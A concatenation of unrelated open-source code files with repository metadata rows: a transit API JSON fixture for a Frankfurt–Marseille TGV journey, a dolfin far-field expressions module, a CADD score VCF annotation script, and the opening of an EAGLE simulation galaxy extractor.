"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/journey_patterns/{journey_pattern.id}",
"type": "journey_pattern",
"rel": "journey_patterns",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/routes/{route.id}",
"type": "route",
"rel": "routes",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/journey_pattern_points/{journey_pattern_point.id}",
"type": "journey_pattern_point",
"rel": "journey_pattern_points",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys/{vehicle_journeys.id}",
"type": "vehicle_journeys",
"rel": "vehicle_journeys",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/trips/{trip.id}",
"type": "trip",
"rel": "trips",
"templated": true
},
{
"href": "http://localhost:5001/v1/coverage/stif/vehicle_journeys?depth=2&since=20121120T115800%2B0000&until=20121120T214630%2B0000&headsign=9580",
"type": "first",
"templated": false
}
],
"disruptions": [],
"feed_publishers": [],
"context": {
"timezone": "Europe/Paris",
"current_datetime": "20190515T111555"
},
"vehicle_journeys": [
{
"codes": [],
"name": "9580",
"journey_pattern": {
"route": {
"direction": {
"embedded_type": "stop_area",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-751008-BV"
},
{
"type": "UIC8",
"value": "87751008"
},
{
"type": "external_code",
"value": "OCE87751008"
}
],
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87751008"
},
"quality": 0,
"name": "gare de Marseille-St-Charles (Marseille)",
"id": "stop_area:OCE:SA:87751008"
},
"name": "Frankfurt-am-Main-Hbf vers Marseille-St-Charles",
"links": [],
"is_frequence": "False",
"geojson": {
"type": "MultiLineString",
"coordinates": []
},
"direction_type": "forward",
"id": "route:OCE:TGV-80110684-87751008-1"
},
"id": "journey_pattern:7491",
"name": "journey_pattern:7491"
},
"disruptions": [],
"calendars": [
{
"exceptions": [
{
"type": "remove",
"datetime": "20121201"
}
],
"active_periods": [
{
"begin": "20121029",
"end": "20121208"
}
],
"week_pattern": {
"monday": true,
"tuesday": true,
"friday": true,
"wednesday": true,
"thursday": true,
"sunday": true,
"saturday": true
}
}
],
"stop_times": [
{
"stop_point": {
"name": "gare de Frankfurt-am-Main-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Frankfurt-am-Main-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80110684",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-110684-00"
},
{
"type": "UIC8",
"value": "80110684"
},
{
"type": "external_code",
"value": "OCE80110684"
}
],
"name": "gare de Frankfurt-am-Main-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Frankfurt-am-Main-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80110684"
}
},
"utc_arrival_time": "130100",
"utc_departure_time": "130100",
"headsign": "9580",
"arrival_time": "140100",
"journey_pattern_point": {
"id": "journey_pattern_point:71093"
},
"departure_time": "140100"
},
{
"stop_point": {
"name": "gare de Mannheim-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Mannheim-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80140087",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-140087-BV"
},
{
"type": "UIC8",
"value": "80140087"
},
{
"type": "external_code",
"value": "OCE80140087"
}
],
"name": "gare de Mannheim-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Mannheim-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80140087"
}
},
"utc_arrival_time": "133700",
"utc_departure_time": "134000",
"headsign": "9580",
"arrival_time": "143700",
"journey_pattern_point": {
"id": "journey_pattern_point:71094"
},
"departure_time": "144000"
},
{
"stop_point": {
"name": "gare de Karlsruhe-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Karlsruhe-Hbf",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80142281",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-142281-BV"
},
{
"type": "UIC8",
"value": "80142281"
},
{
"type": "external_code",
"value": "OCE80142281"
}
],
"name": "gare de Karlsruhe-Hbf",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Karlsruhe-Hbf",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80142281"
}
},
"utc_arrival_time": "140200",
"utc_departure_time": "141200",
"headsign": "9580",
"arrival_time": "150200",
"journey_pattern_point": {
"id": "journey_pattern_point:71095"
},
"departure_time": "151200"
},
{
"stop_point": {
"name": "gare de Baden-Baden",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Baden-Baden",
"equipments": [],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-80142778",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0080-142778-BV"
},
{
"type": "UIC8",
"value": "80142778"
},
{
"type": "external_code",
"value": "OCE80142778"
}
],
"name": "gare de Baden-Baden",
"links": [],
"coord": {
"lat": "0",
"lon": "0"
},
"label": "gare de Baden-Baden",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:80142778"
}
},
"utc_arrival_time": "143100",
"utc_departure_time": "143400",
"headsign": "9580",
"arrival_time": "153100",
"journey_pattern_point": {
"id": "journey_pattern_point:71096"
},
"departure_time": "153400"
},
{
"stop_point": {
"name": "gare de Strasbourg",
"links": [],
"coord": {
"lat": "48.585151",
"lon": "7.733945"
},
"label": "gare de Strasbourg (Strasbourg)",
"equipments": [],
"administrative_regions": [
{
"insee": "67482",
"name": "Strasbourg",
"level": 8,
"coord": {
"lat": "48.584614",
"lon": "7.750712"
},
"label": "Strasbourg (67000-67200)",
"id": "admin:fr:67482",
"zip_code": "67000;67200"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87212027",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-212027-BV"
},
{
"type": "UIC8",
"value": "87212027"
},
{
"type": "external_code",
"value": "OCE87212027"
}
],
"name": "gare de Strasbourg",
"links": [],
"coord": {
"lat": "48.585151",
"lon": "7.733945"
},
"label": "gare de Strasbourg (Strasbourg)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87212027"
}
},
"utc_arrival_time": "150300",
"utc_departure_time": "151200",
"headsign": "9581",
"arrival_time": "160300",
"journey_pattern_point": {
"id": "journey_pattern_point:71097"
},
"departure_time": "161200"
},
{
"stop_point": {
"name": "gare de Mulhouse",
"links": [],
"coord": {
"lat": "47.741786",
"lon": "7.342833"
},
"label": "gare de Mulhouse (Mulhouse)",
"equipments": [],
"administrative_regions": [
{
"insee": "68224",
"name": "Mulhouse",
"level": 8,
"coord": {
"lat": "47.749416",
"lon": "7.339935"
},
"label": "Mulhouse (68100-68200)",
"id": "admin:fr:68224",
"zip_code": "68100;68200"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87182063",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-182063-BV"
},
{
"type": "UIC8",
"value": "87182063"
},
{
"type": "external_code",
"value": "OCE87182063"
}
],
"name": "gare de Mulhouse",
"links": [],
"coord": {
"lat": "47.741786",
"lon": "7.342833"
},
"label": "gare de Mulhouse (Mulhouse)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87182063"
}
},
"utc_arrival_time": "155900",
"utc_departure_time": "160800",
"headsign": "9580",
"arrival_time": "165900",
"journey_pattern_point": {
"id": "journey_pattern_point:71098"
},
"departure_time": "170800"
},
{
"stop_point": {
"name": "gare de Belfort-Montbéliard-TGV",
"links": [],
"coord": {
"lat": "47.586579",
"lon": "6.899019"
},
"label": "gare de Belfort-Montbéliard-TGV (Meroux)",
"equipments": [],
"administrative_regions": [
{
"insee": "90068",
"name": "Meroux",
"level": 8,
"coord": {
"lat": "47.596069",
"lon": "6.899145"
},
"label": "Meroux (90400)",
"id": "admin:fr:90068",
"zip_code": "90400"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87300822",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-300822-BV"
},
{
"type": "UIC8",
"value": "87300822"
},
{
"type": "external_code",
"value": "OCE87300822"
}
],
"name": "gare de Belfort-Montbéliard-TGV",
"links": [],
"coord": {
"lat": "47.586579",
"lon": "6.899019"
},
"label": "gare de Belfort-Montbéliard-TGV (Meroux)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87300822"
}
},
"utc_arrival_time": "163000",
"utc_departure_time": "163300",
"headsign": "9580",
"arrival_time": "173000",
"journey_pattern_point": {
"id": "journey_pattern_point:71099"
},
"departure_time": "173300"
},
{
"stop_point": {
"name": "gare de Besançon-Franche-Comté",
"links": [],
"coord": {
"lat": "47.30746",
"lon": "5.954751"
},
"label": "gare de Besançon-Franche-Comté (Les Auxons)",
"equipments": [],
"administrative_regions": [
{
"insee": "25035",
"name": "Les Auxons",
"level": 8,
"coord": {
"lat": "47.301167",
"lon": "5.957158"
},
"label": "Les Auxons (25870)",
"id": "admin:fr:25035",
"zip_code": "25870"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87300863",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-300863-BV"
},
{
"type": "UIC8",
"value": "87300863"
},
{
"type": "external_code",
"value": "OCE87300863"
}
],
"name": "gare de Besançon-Franche-Comté",
"links": [],
"coord": {
"lat": "47.30746",
"lon": "5.954751"
},
"label": "gare de Besançon-Franche-Comté (Les Auxons)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87300863"
}
},
"utc_arrival_time": "165400",
"utc_departure_time": "165900",
"headsign": "9580",
"arrival_time": "175400",
"journey_pattern_point": {
"id": "journey_pattern_point:71100"
},
"departure_time": "175900"
},
{
"stop_point": {
"name": "gare de Chalon-sur-Saône",
"links": [],
"coord": {
"lat": "46.781666",
"lon": "4.84323"
},
"label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)",
"equipments": [],
"administrative_regions": [
{
"insee": "71076",
"name": "Chalon-sur-Saône",
"level": 8,
"coord": {
"lat": "46.788898",
"lon": "4.85296"
},
"label": "Chalon-sur-Saône (71100)",
"id": "admin:fr:71076",
"zip_code": "71100"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87725002",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-725002-BV"
},
{
"type": "UIC8",
"value": "87725002"
},
{
"type": "external_code",
"value": "OCE87725002"
}
],
"name": "gare de Chalon-sur-Saône",
"links": [],
"coord": {
"lat": "46.781666",
"lon": "4.84323"
},
"label": "gare de Chalon-sur-Saône (Chalon-sur-Saône)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87725002"
}
},
"utc_arrival_time": "175400",
"utc_departure_time": "175600",
"headsign": "9581",
"arrival_time": "185400",
"journey_pattern_point": {
"id": "journey_pattern_point:71101"
},
"departure_time": "185600"
},
{
"stop_point": {
"name": "gare de Lyon-Part-Dieu",
"links": [],
"coord": {
"lat": "45.76058",
"lon": "4.859438"
},
"label": "gare de Lyon-Part-Dieu (Lyon)",
"equipments": [],
"administrative_regions": [
{
"insee": "69123",
"name": "Lyon",
"level": 8,
"coord": {
"lat": "45.757812",
"lon": "4.832011"
},
"label": "Lyon (69001-69009)",
"id": "admin:fr:69123",
"zip_code": "69001;69009"
},
{
"insee": "69383",
"name": "Lyon 3e Arrondissement",
"level": 9,
"coord": {
"lat": "45.759933",
"lon": "4.849389"
},
"label": "Lyon 3e Arrondissement (69003)",
"id": "admin:fr:69383",
"zip_code": "69003"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87723197",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-723197-BV"
},
{
"type": "UIC8",
"value": "87723197"
},
{
"type": "external_code",
"value": "OCE87723197"
}
],
"name": "gare de Lyon-Part-Dieu",
"links": [],
"coord": {
"lat": "45.76058",
"lon": "4.859438"
},
"label": "gare de Lyon-Part-Dieu (Lyon)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87723197"
}
},
"utc_arrival_time": "185600",
"utc_departure_time": "190600",
"headsign": "9581",
"arrival_time": "195600",
"journey_pattern_point": {
"id": "journey_pattern_point:71102"
},
"departure_time": "200600"
},
{
"stop_point": {
"name": "gare de Avignon-TGV",
"links": [],
"coord": {
"lat": "43.921963",
"lon": "4.78616"
},
"label": "gare de Avignon-TGV (Avignon)",
"equipments": [],
"administrative_regions": [
{
"insee": "84007",
"name": "Avignon",
"level": 8,
"coord": {
"lat": "43.949314",
"lon": "4.806032"
},
"label": "Avignon (84000)",
"id": "admin:fr:84007",
"zip_code": "84000"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87318964",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-318964-BV"
},
{
"type": "UIC8",
"value": "87318964"
},
{
"type": "external_code",
"value": "OCE87318964"
}
],
"name": "gare de Avignon-TGV",
"links": [],
"coord": {
"lat": "43.921963",
"lon": "4.78616"
},
"label": "gare de Avignon-TGV (Avignon)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87318964"
}
},
"utc_arrival_time": "200800",
"utc_departure_time": "201100",
"headsign": "9581",
"arrival_time": "210800",
"journey_pattern_point": {
"id": "journey_pattern_point:71103"
},
"departure_time": "211100"
},
{
"stop_point": {
"name": "gare de Aix-en-Provence-TGV",
"links": [],
"coord": {
"lat": "43.455151",
"lon": "5.317273"
},
"label": "gare de Aix-en-Provence-TGV (Aix-en-Provence)",
"equipments": [],
"administrative_regions": [
{
"insee": "13001",
"name": "Aix-en-Provence",
"level": 8,
"coord": {
"lat": "43.529842",
"lon": "5.447473"
},
"label": "Aix-en-Provence (13090-13100)",
"id": "admin:fr:13001",
"zip_code": "13090;13100"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87319012",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-319012-00"
},
{
"type": "UIC8",
"value": "87319012"
},
{
"type": "external_code",
"value": "OCE87319012"
}
],
"name": "gare de Aix-en-Provence-TGV",
"links": [],
"coord": {
"lat": "43.455151",
"lon": "5.317273"
},
"label": "gare de Aix-en-Provence-TGV (Aix-en-Provence)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87319012"
}
},
"utc_arrival_time": "203100",
"utc_departure_time": "203400",
"headsign": "9581",
"arrival_time": "213100",
"journey_pattern_point": {
"id": "journey_pattern_point:71104"
},
"departure_time": "213400"
},
{
"stop_point": {
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"equipments": [],
"administrative_regions": [
{
"insee": "13055",
"name": "Marseille",
"level": 8,
"coord": {
"lat": "43.296173",
"lon": "5.369952"
},
"label": "Marseille (13000-13016)",
"id": "admin:fr:13055",
"zip_code": "13000;13016"
}
],
"fare_zone": {
"name": "0"
},
"id": "stop_point:OCE:SP:TGV-87751008",
"stop_area": {
"codes": [
{
"type": "CR-CI-CH",
"value": "0087-751008-BV"
},
{
"type": "UIC8",
"value": "87751008"
},
{
"type": "external_code",
"value": "OCE87751008"
}
],
"name": "gare de Marseille-St-Charles",
"links": [],
"coord": {
"lat": "43.30273",
"lon": "5.380659"
},
"label": "gare de Marseille-St-Charles (Marseille)",
"timezone": "Europe/Paris",
"id": "stop_area:OCE:SA:87751008"
}
},
"utc_arrival_time": "204600",
"utc_departure_time": "204600",
"headsign": "9581",
"arrival_time": "214600",
"journey_pattern_point": {
"id": "journey_pattern_point:71105"
},
"departure_time": "214600"
}
],
"validity_pattern": {
"beginning_date": "20120913",
"days": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111101111111111111111111111111111111110000000000000000000000000000000000000000000000"
},
"id": "vehicle_journey:OCE:SN009580F03012_dst_1",
"trip": {
"id": "OCE:SN009580F03012",
"name": "9580"
}
}
]
}"""
| agpl-3.0 | 8,753,083,801,675,113,000 | 29.749226 | 384 | 0.373305 | false | 3.691278 | false | false | false |
cemagg/sucem-fem | sucemfem/PostProcessing/ntff_expressions.py | 1 | 1402 | ## Copyright (C) 2011 Stellenbosch University
##
## This file is part of SUCEM.
##
## SUCEM is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## SUCEM is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with SUCEM. If not, see <http://www.gnu.org/licenses/>.
##
## Contact: cemagga@gmail.com
# Authors:
# Neilen Marais <nmarais@gmail.com>
import dolfin
from dolfin import dot
get_r_hat = lambda : dolfin.Expression(
['sin(theta)*cos(phi)', 'sin(theta)*sin(phi)', 'cos(theta)'],
theta=0, phi=0)
get_k0 = lambda : dolfin.Expression('k0', k0=0)
get_theta_hat = lambda : dolfin.Expression(
['cos(theta)*cos(phi)', 'cos(theta)*sin(phi)', '-sin(theta)'],
theta=0, phi=0)
get_phi_hat = lambda : dolfin.Expression(['-sin(phi)', 'cos(phi)', '0.'], phi=0)
get_phase = lambda k0, rprime, r_hat : k0*dot(rprime, r_hat)
get_3d_vector = lambda : dolfin.Expression(['x1', 'x2', 'x3'],
x1=0, x2=0, x3=0)
| gpl-3.0 | 1,902,183,725,171,656,400 | 34.948718 | 80 | 0.666904 | false | 3.067834 | false | false | false |
CuppenResearch/SmallTools | Annotate_CADD_Scores_In_VCF.py | 3 | 5238 | #!/usr/bin/python
import sys, os
import vcf
import tabix
from time import time
from time import sleep
import multiprocessing as mp
from optparse import OptionParser
"""
CADD FORMAT
#Chrom Pos Ref Alt RawScore PHRED
1 10001 T A 0.176634 5.959
1 10001 T C 0.114925 5.063
"""
parser = OptionParser()
parser.add_option("--vcf", dest="vcf_file", help="Path to VCF to annotate", default=False)
parser.add_option("--snv", dest="cadd_snvs", help="Path to prescored SNVs", default=False)
parser.add_option("--indel", dest="cadd_indels", help="Path to prescored InDels", default=False)
parser.add_option("--t", dest="nr_cpus", help="Number of CPUs to use", default=8)
parser.add_option("--out", dest="out_file", help="Path to output VCF file", default="out.vcf")
(options, args) = parser.parse_args()
def check_arguments(options):
#print("Checking arguments")
if not options.vcf_file or not os.path.exists(options.vcf_file):
print("Invalid VCF file %s"%(options.vcf_file))
return False
# ---- SNV file ---
if not options.cadd_snvs or not os.path.exists(options.cadd_snvs):
print("Invalid CADD SNV file %s"%(options.cadd_snvs))
return False
if not os.path.exists(options.cadd_snvs+".tbi"):
print("No Index for CADD SNV file %s"%(options.cadd_snvs+".tbi"))
return False
# ---- InDel file ---
if not options.cadd_indels or not os.path.exists(options.cadd_indels):
print("Invalid CADD InDel file %s"%(options.cadd_indels))
return False
if not os.path.exists(options.cadd_indels+".tbi"):
print("No Index for CADD InDel file %s"%(options.cadd_indels+".tbi"))
return False
# ---- Other settings ----
try:
int(options.nr_cpus)
except Exception, e:
print("Invalid nr of cpus defined %s"%(options.nr_cpus))
return False
return True
# CHECK arguments
if not check_arguments(options):
print("Error in provided arguments")
exit(0)
# CREATE globals
VCF_READER = vcf.Reader(open(options.vcf_file, 'r'))
VCF_WRITER = vcf.Writer(open(options.out_file, 'w'), VCF_READER)
VCF_WRITER.close()
VALID_CHROMOSOMES = {"1":True,"2":True,"3":True,"4":True,"5":True,"6":True,"7":True,"8":True,"9":True,"10":True,"11":True,"12":True,"13":True,"14":True,"15":True,"16":True,"17":True,"18":True,"19":True,"20":True,"21":True,"22":True,"X":True,"Y":True}
# CADD extraction function
def extract_CADD_score(arguments, q):
vcf_record, caddfile = arguments
tb = tabix.open(caddfile)
chromosome = (vcf_record.CHROM).replace("chr","")
vcf_record.INFO["RAWCADD"] = 0
vcf_record.INFO["PHREDCADD"] = 0
# Specific for CADD files
# FIXME: get info about chr or not from provided VCF file
records = tb.query(chromosome, vcf_record.POS-1, vcf_record.POS)
# Look for matching mutation
# Works for SNVs, InDels optimisation is ongoing
for rec in records:
if rec[3] == vcf_record.ALT[0]:
# FIXME: Make requested fields optional through arguments
vcf_record.INFO["RAWCADD"] = rec[4]
vcf_record.INFO["PHREDCADD"] = rec[5]
break
# workaround since multiprocess can't handle VCF record class objects
# FIXME: use VCF class records rather than this ugly string
annotated = VCF_WRITER._map(str, [vcf_record.CHROM, vcf_record.POS, vcf_record.ID, vcf_record.REF]) + [VCF_WRITER._format_alt(vcf_record.ALT), str(vcf_record.QUAL) or '.', VCF_WRITER._format_filter(vcf_record.FILTER), VCF_WRITER._format_info(vcf_record.INFO)]
# Return results to Queue
q.put(annotated)
return(annotated)
def listener(q):
'''listens for messages on the q, writes to file. '''
#sys.stdout.write('Starting listener\n')
f = open(options.out_file, 'wb')
#FIXME: get the rest of the header
f.write("##INFO=<ID=PHREDCADD,Number=1,Type=Float,Description=\"PHRED scaled CADD score\">")
f.write("##INFO=<ID=RAWCADD,Number=1,Type=Float,Description=\"Raw CADD score\">")
f.write('#' + '\t'.join(VCF_WRITER.template._column_headers + VCF_WRITER.template.samples) + '\n')
f.flush()
while 1:
m = q.get()
if m == 'kill':
if not q.empty():
# received kill signal without finishing all the processes
sys.stdout.write('ERROR\n')
break
# received kill signal, finished all the processes, done
sys.stdout.write('DONE\n')
break
# A vcf record was found, write to file
f.write('\t'.join(m)+'\n')
f.flush()
f.close()
def main():
currtime = time()
#Init Manager queue
manager = mp.Manager()
q = manager.Queue()
# Init worker pool
pool = mp.Pool(int(options.nr_cpus))
#Init Listener
watcher = pool.apply_async(listener, (q,))
#print("Filling Queue")
#fire off workers
jobs = []
for vcf_record in VCF_READER:
chromosome = (vcf_record.CHROM).replace("chr","")
if chromosome not in VALID_CHROMOSOMES:
continue
arguments = []
if vcf_record.is_indel:
arguments = [vcf_record, options.cadd_indels]
else:
arguments = [vcf_record, options.cadd_snvs]
job = pool.apply_async(extract_CADD_score, (arguments, q))
jobs.append(job)
#print("Collecting results")
# collect results from the workers through the pool result queue
for job in jobs:
job.get()
# now we are done, kill the listener
q.put('kill')
pool.close()
pool.join()
print 'time elapsed:', time() - currtime
if __name__ == "__main__":
main()
| gpl-3.0 | -5,641,984,427,018,919,000 | 27.939227 | 260 | 0.682131 | false | 2.826767 | false | false | false |
SKIRT/PTS | eagle/extractor.py | 1 | 39415 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.eagle.extractor Extracting data for a given EAGLE galaxy from the simulation snapshot.
#
# The EAGLE simulation output is stored in a (large) set of data files in the HDF5 format, documented at the
# <a href="http://www.hdfgroup.org/HDF5/">HDF5 home page</a>. The output is organized in \em snapshots, where
# each snapshot represents the state of the universe at a particular time (or equivalently, redshift).
#
# The function in this module allows extracting information relevant for SKIRT from the EAGLE output.
# The function converts physical quantities from EAGLE snapshot units (documented through HDF5 attributes
# in the snapshot files) to SKIRT import units (documented in the SKIRT SPH classes).
# The following table lists some of the units in each system.
#
#<TABLE>
#<TR><TD><B>Physical Quantity</B></TD> <TD><B>EAGLE snapshot</B></TD>
# <TD><B>SKIRT import</B></TD></TR>
#<TR><TD>position, size</TD> <TD>\f$\textrm{Mpc}\,a\,h^{-1}\f$</TD>
# <TD>\f$\textrm{pc}\f$</TD></TR>
#<TR><TD>mass</TD> <TD>\f$10^{10}\,\textrm{M}_\odot\,h^{-1}\f$</TD>
# <TD>\f$\textrm{M}_\odot\f$</TD></TR>
#<TR><TD>velocity</TD> <TD>\f$\textrm{km/s}\,a^{1/2}\f$</TD>
# <TD>--</TD></TR>
#<TR><TD>time, age</TD> <TD>--</TD>
# <TD>year</TD></TR>
#<TR><TD>temperature</TD> <TD>K</TD>
# <TD>--</TD></TR>
#</TABLE>
#
# Note the corrections for cosmological scale factor \f$a\f$ and Hubble parameter \f$h\f$ in the EAGLE snapshot units.
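#
# As a worked example (with illustrative parameter values): a coordinate of
# \f$0.05\,\textrm{Mpc}\,a\,h^{-1}\f$ with \f$h=0.6777\f$ and \f$a=1\f$ corresponds to
# \f$0.05\times10^6/0.6777\approx7.4\times10^4\f$ pc, which is exactly what the toparsec()
# helper in this module computes.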
# -----------------------------------------------------------------
import os.path
import numpy as np
import h5py
import read_eagle  # EAGLE-specific package which must be installed separately
from ..core.tools.geometry import Transform
from . import config as config
from .skirtrun import SkirtRun
# -----------------------------------------------------------------
## This function extracts information relevant for SKIRT from the EAGLE output for the galaxy described
# by the specified SKIRT-runs database record. It places the resulting files in the "in" folder of the
# appropriate SkirtRun data structure. The function uses the following fields in the specified record:
# runid, eaglesim, snaptag, galaxyid, groupnr, subgroupnr, copx, copy, copz.
#
# The exported files are named "SIM_GID_stars.dat", "SIM_GID_hii.dat", and "SIM_GID_gas.dat", where
# SIM and GID are replaced respectively by the name of the simulation in which the galaxy resides and by the
# identifier of the galaxy in the public EAGLE database. The file format is as described for SKIRT SPH import.
# In addition, the function creates a text file named "SIM_GID_info.txt", which contains relevant statistics
# including particle numbers and various total masses. Its contents are documented in the file.
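#
# A minimal usage sketch with a hypothetical record is shown below; all field values are
# illustrative only, and in practice the record is obtained from the SKIRT-runs database:
#
#     record = { "runid": 1, "eaglesim": "RefL0100N1504", "snaptag": 28, "galaxyid": 1234,
#                "groupnr": 1, "subgroupnr": 0, "copx": 10.0, "copy": 10.0, "copz": 10.0 }
#     extract(record)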
def extract(record):
# ---- get the particle data
# initialise star and gas dictionaries
sdat = {}
gdat = {}
yngstars = {}
hiiregions = {}
# open snapshot and read relevant field attributes
sfn = snapfilename(record["eaglesim"], record["snaptag"])
snapshot = read_eagle.EagleSnapshot(sfn)
params = fieldAttrs(sfn, "Header")
params.update(fieldAttrs(sfn, "Constants"))
params.update(fieldAttrs(sfn, "RuntimePars"))
hubbleparam = params["HubbleParam"]
expansionfactor = params["ExpansionFactor"]
schmidtparams = schmidtParameters(params)
# convert center of potential to snapshot units
copx = record["copx"] * hubbleparam
copy = record["copy"] * hubbleparam
copz = record["copz"] * hubbleparam
# specify (2*250kpc)^3 physical volume about galaxy centre
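    # (snapshot coordinates are comoving Mpc/h, so 0.25 Mpc physical corresponds to 0.25*h/a in snapshot units)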
delta = 0.25 * hubbleparam / expansionfactor
snapshot.select_region(copx-delta, copx+delta, copy-delta, copy+delta, copz-delta, copz+delta)
    # read star particle information
insubhalo = (snapshot.read_dataset(4, "GroupNumber") == record["groupnr"]) & \
(snapshot.read_dataset(4, "SubGroupNumber") == record["subgroupnr"])
sdat['r'] = snapshot.read_dataset(4, "Coordinates") [insubhalo]
sdat['h'] = snapshot.read_dataset(4, "SmoothingLength") [insubhalo]
sdat['im'] = snapshot.read_dataset(4, "InitialMass") [insubhalo]
sdat['m'] = snapshot.read_dataset(4, "Mass") [insubhalo]
sdat['v'] = snapshot.read_dataset(4, "Velocity") [insubhalo]
sdat['Z'] = snapshot.read_dataset(4, "SmoothedMetallicity") [insubhalo]
sdat['born'] = snapshot.read_dataset(4, "StellarFormationTime") [insubhalo]
sdat['rho_born'] = snapshot.read_dataset(4, "BirthDensity") [insubhalo]
    # read gas particle information
insubhalo = (snapshot.read_dataset(0, "GroupNumber") == record["groupnr"]) & \
(snapshot.read_dataset(0, "SubGroupNumber") == record["subgroupnr"])
gdat['r'] = snapshot.read_dataset(0, "Coordinates") [insubhalo]
gdat['h'] = snapshot.read_dataset(0, "SmoothingLength") [insubhalo]
gdat['m'] = snapshot.read_dataset(0, "Mass") [insubhalo]
gdat['v'] = snapshot.read_dataset(0, "Velocity") [insubhalo]
gdat['Z'] = snapshot.read_dataset(0, "SmoothedMetallicity") [insubhalo]
gdat['T'] = snapshot.read_dataset(0, "Temperature") [insubhalo]
gdat['rho'] = snapshot.read_dataset(0, "Density") [insubhalo]
gdat['sfr'] = snapshot.read_dataset(0, "StarFormationRate") [insubhalo]
# convert units
sdat['r'] = periodicCorrec(sdat['r'], params["BoxSize"])
sdat['r'] = toparsec(sdat['r'], hubbleparam, expansionfactor)
sdat['h'] = toparsec(sdat['h'], hubbleparam, expansionfactor)
sdat['im'] = tosolar(sdat['im'], hubbleparam)
sdat['m'] = tosolar(sdat['m'], hubbleparam)
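    # stellar age = cosmic time now minus cosmic time at birth (see the age() helper near the end of this module)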
sdat['t'] = age(sdat['born']) - age(expansionfactor)
    sdat['rho_born'] *= 6.7699e-31        # to g cm^-3 (EAGLE code density unit)
gdat['r'] = periodicCorrec(gdat['r'], params["BoxSize"])
gdat['r'] = toparsec(gdat['r'], hubbleparam, expansionfactor)
gdat['h'] = toparsec(gdat['h'], hubbleparam, expansionfactor)
gdat['m'] = tosolar(gdat['m'], hubbleparam)
gdat['rho'] = togcm3(gdat['rho'], hubbleparam, expansionfactor)
    # remember density conversion from g cm^-3 to M_sun pc^-3
